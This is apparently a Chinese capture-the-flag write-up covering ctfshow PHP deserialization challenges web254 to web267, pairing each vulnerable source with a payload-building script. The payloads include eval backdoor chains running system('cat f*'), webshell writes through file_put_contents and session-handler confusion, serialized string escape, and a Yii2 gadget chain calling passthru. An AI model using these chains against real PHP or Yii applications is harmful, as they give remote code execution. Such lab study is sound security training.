ctfshow-web入門-反序列化(前篇)

目錄

web254

web255

web256

web257

web258

web259

web260

web261

web262

web263

web264

web265

web266

web267

web254

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
?
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
?
    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        if($this->username===$u&&$this->password===$p){
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}
?
$username=$_GET['username'];
$password=$_GET['password'];
?
if(isset($username) && isset($password)){
    $user = new ctfShowUser();
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
} 

直接審一下代碼可以知道

username=xxxxxx&password=xxxxxx

就可以flag

web255

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
?
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
?
    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            echo "your flag is ".$flag;
        }else{
            echo "no vip, no flag";
        }
    }
}
?
$username=$_GET['username'];
$password=$_GET['password'];
?
if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
}

首先，get傳入的username和password都是xxxxx

原始碼里面有

$user = unserialize($_COOKIE['user'])
$user->login($username,$password)

然后就是說，我們需要讓反序列化后的結果是ctfshowUser的實體化物件，有因為只有$this->isVip為true才能是flag，所以反序列化的內容

<?php
class ctfShowUser{
    public $isVip=true;
}
echo serialize(new ctfShowUser);

web256

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 19:29:02
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
?
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
?
    public function checkVip(){
        return $this->isVip;
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
        if($this->isVip){
            global $flag;
            if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }
        }else{
            echo "no vip, no flag";
        }
    }
}
?
$username=$_GET['username'];
$password=$_GET['password'];
?
if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
        if($user->checkVip()){
            $user->vipOneKeyGetFlag();
        }
    }else{
        echo "no vip,no flag";
    }
} 

構造陳述句與上題相似，但是這里

if($this->username!==$this->password){
                    echo "your flag is ".$flag;
              }

是username不等于password，然后就是直接寫代碼就好了

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='6';   //修改password的值使得與username的值不一樣
    public $isVip=true;}
$a= serialize(new ctfShowUser());
echo urlencode($a);
?>
以上php腳本，得到我們需要的序列化字串，注意要進行URL編碼！
?
輸出：O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A1%3A%226%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

web257

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 20:33:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
error_reporting(0);
highlight_file(__FILE__);
?
class ctfShowUser{
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';
?
    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
?
}
?
class info{
    private $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
?
class backDoor{
    private $code;
    public function getInfo(){
        eval($this->code);
    }
}
?
$username=$_GET['username'];
$password=$_GET['password'];
?
if(isset($username) && isset($password)){
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

很明顯的我們一眼就看到了eval那個函式，所以肯定要利用那個函式

然后再往上面看有一個__construct()函式，然后我們可以利用這個構造的函式

構造代碼

<?php
class ctfShowUser{
    private $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    private $code='system("cat f*");';
}
$b=new ctfShowUser();
echo urlencode(serialize($b));

web258

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-02 17:44:47
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-02 21:38:56
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
error_reporting(0);
highlight_file(__FILE__);
?
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';
?
    public function __construct(){
        $this->class=new info();
    }
    public function login($u,$p){
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
        $this->class->getInfo();
    }
?
}
?
class info{
    public $user='xxxxxx';
    public function getInfo(){
        return $this->user;
    }
}
?
class backDoor{
    public $code;
    public function getInfo(){
        eval($this->code);
    }
}
?
$username=$_GET['username'];
$password=$_GET['password'];
?
if(isset($username) && isset($password)){
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

在上一個題的基礎上加了個正則，只需要把O后面的數字加個加號可以繞過了，再把private改為public

構造代碼

<?php
class ctfShowUser{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=true;
    public $class = 'backDoor';
?
    public function __construct(){
        $this->class=new backDoor();
    }
?
    public function __destruct(){
        $this->class->getInfo();
    }
?
}
?
class backDoor{
    public $code="system('cat flag.php');";
    public function getInfo(){
        eval($this->code);
    }
}
$a = new ctfShowUser();
$a = serialize($a);
$a= str_replace('O:', 'O:+',$a);//繞過preg_match
echo urlencode($a);

然后添加cookie，再添加上username和password，得到flag

web259

暫時不大會~~

web260

題目的意思就是序列化出來的東西包含字串ctfshow_i_love_36D，就可以了，所以我們可以直接傳ctfshow=ctfshow_i_love_36D

web261

<?php
?
highlight_file(__FILE__);
?
class ctfshowvip{
    public $username;
    public $password;
    public $code;
?
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function __wakeup(){
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    public function __invoke(){
        eval($this->code);
    }
?
    public function __sleep(){
        $this->username='';
        $this->password='';
    }
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }
}
?
unserialize($_GET['vip']); 

注：

如果類中同時定義了 __unserialize() 和 __wakeup() 兩個魔術方法， 則只有 __unserialize() 方法會生效，__wakeup() 方法會被忽略，

首先我們可以先看這一塊，在這里code如果弱類等于0x36d(877)就可以執行里面的寫入，而且code是username和password拼接出來的，所以只要username=877.php password=shell就可以了

877.php==877是成立

public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }

最后的payload

<?php
class ctfshowvip{
    public $username;
    public $password;
 
    public function __construct($u='',$p=''){
        $this->username="877.php";
        $this->password="<?php eval(system('tac /fl*')); ?>";
    } 
}
echo urlencode(serialize(new ctfshowvip()));

web262

原始碼以及message.php

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
?
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
?
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
?
if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}
?
highlight_file(__FILE__);

message.php

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));
    echo 'Your message has been sent';
}

這個題考察的反序列化字串逃逸，在message.php頁面，我們可以看到需要token為admin才能輸出flag

先隨便輸出一個構造代碼

<?php
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
?
function filter($msg){
    return str_replace('fuck', 'loveU', $msg);
}
?
$msg = new message('a','b','c');
?
$msg_1 = serialize($msg);
?
echo $msg_1;
?
//O:7:"message":4:{s:4:"from";s:1:"a";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}

然后加上過濾后的結果

<?php
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
?
function filter($msg){
    return str_replace('fuck', 'loveU', $msg);
}
?
$msg = new message('a','b','c');
?
$msg_1 = serialize($msg);
?
$msg_2 =filter($msg_1);
?
echo $msg_2;
?
//O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}

在這里很明顯可以看出來，4與loveU對應，然后4和五個字符，可以逃逸一個字符，然后再這里先寫出payload

//O:7:"message":4:{s:4:"from";s:4:"loveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}

";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}

添加上payload的代碼如下

<?php
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
?
function filter($msg){
    return str_replace('fuck', 'loveU', $msg);
}
?
$msg = new message('fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}','b','c');
?
$msg_1 = serialize($msg);
?
//echo $msg_1;
?
?
$msg_2 =filter($msg_1);
?
echo $msg_2;
?
//O:7:"message":4:{s:4:"from";s:310:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:5:"admin";}";s:3:"msg";s:1:"b";s:2:"to";s:1:"c";s:5:"token";s:4:"user";}

然后在message.php中要進行一個base64編碼就可以了

web263

php引擎的存盤格式是鍵名|serialized_string，而php_serialize引擎存盤格式是serialized_string

一開始是一個原始碼泄露，訪問URL+www.zip得到原始碼

查看inc.php，其中ini_set('session.serialize_handler','php');表明了是使用php引擎

全域搜索session，第一次訪問就會產生session，之后limit沒有超過5的化

    if(isset($_SESSION['limit'])){
        $_SESSION['limti']>5?die("登陸失敗次數超過限制"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
        $_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
    }else{
         setcookie("limit",base64_encode('1'));
         $_SESSION['limit']= 1;
    }

cookie可控，我們可以利用它，來進行構造payload

<?php
class User{
    public $username;
    public $password;
    public $status='a';
?
}
$a=new User();
$a->username='b.php';
$a->password='<?php system("cat f*");?>';
echo base64_encode('|'.serialize($a))；

首先訪問原頁面，修改cookie，然后訪問index.php，在訪問一下check.php，構造出木馬，最終登錄log-a.php

web264

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
?
error_reporting(0);
session_start();
?
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
?
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
?
if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}
?
highlight_file(__FILE__);

與262一樣，不同地方在于

$msg = unserialize(base64_decode($_SESSION['msg']));

用的是session，而不是cookie

在index.php頁面傳

?f=1&m=1&t=1fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

然后訪問message.php，添加一個cookie

web265

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;
?
    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}
?
$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());
?
if($ctfshow->login()){
    echo $flag;
}

利用參考使類的屬性的值永遠相等

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
class ctfshowAdmin{
    public $token;
    public $password;
?
    public function __construct($t,$p){
        $this->token=$t;
        $this->password = &$this->token;
    }
    public function login(){
        return $this->token===$this->password;
    }
}
$admin = new ctfshowAdmin('123','123');
?
echo serialize($admin);

web266

<?php
?
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
?
*/
?
highlight_file(__FILE__);
?
include('flag.php');
$cs = file_get_contents('php://input');
?
?
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}

這里只要出現了ctfshow就會拋出例外錯誤，所以要繞過，這里就是一個大小寫的繞過

<?php
class Ctfshow{};
$a = new Ctfshow();
echo serialize($a);
?>
?
//O:7:"Ctfshow":0:{}

web267

打開頁面，先是弱口令登錄

admin//賬號
admin//密碼

然后f12，查看源代碼，找到了

?view-source

但是與url連接并不是?號而是&號

在這里是一個yii框架的反序列化

這個題system不行，然后看到別人有用passthru有回顯

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
?
        public function __construct(){
            $this->checkAccess = 'passthru';
            $this->id = 'cat /flag';
        }
    }
}
?
namespace Faker{
    use yii\rest\CreateAction;
?
    class Generator{
        protected $formatters;
?
        public function __construct(){
            // 這里需要改為isRunning
            $this->formatters['render'] = [new CreateAction(), 'run'];
        }
    }
}
?
namespace phpDocumentor\Reflection\DocBlock\Tags{
?
    use Faker\Generator;
?
    class See{
        protected $description;
        public function __construct()
        {
            $this->description = new Generator();
        }
    }
}
namespace{
    use phpDocumentor\Reflection\DocBlock\Tags\See;
    class Swift_KeyCache_DiskKeyCache{
        private $keys = [];
        private $path;
        public function __construct()
        {
            $this->path = new See;
            $this->keys = array(
                "axin"=>array("is"=>"handsome")
            );
        }
    }
    // 生成poc
    echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}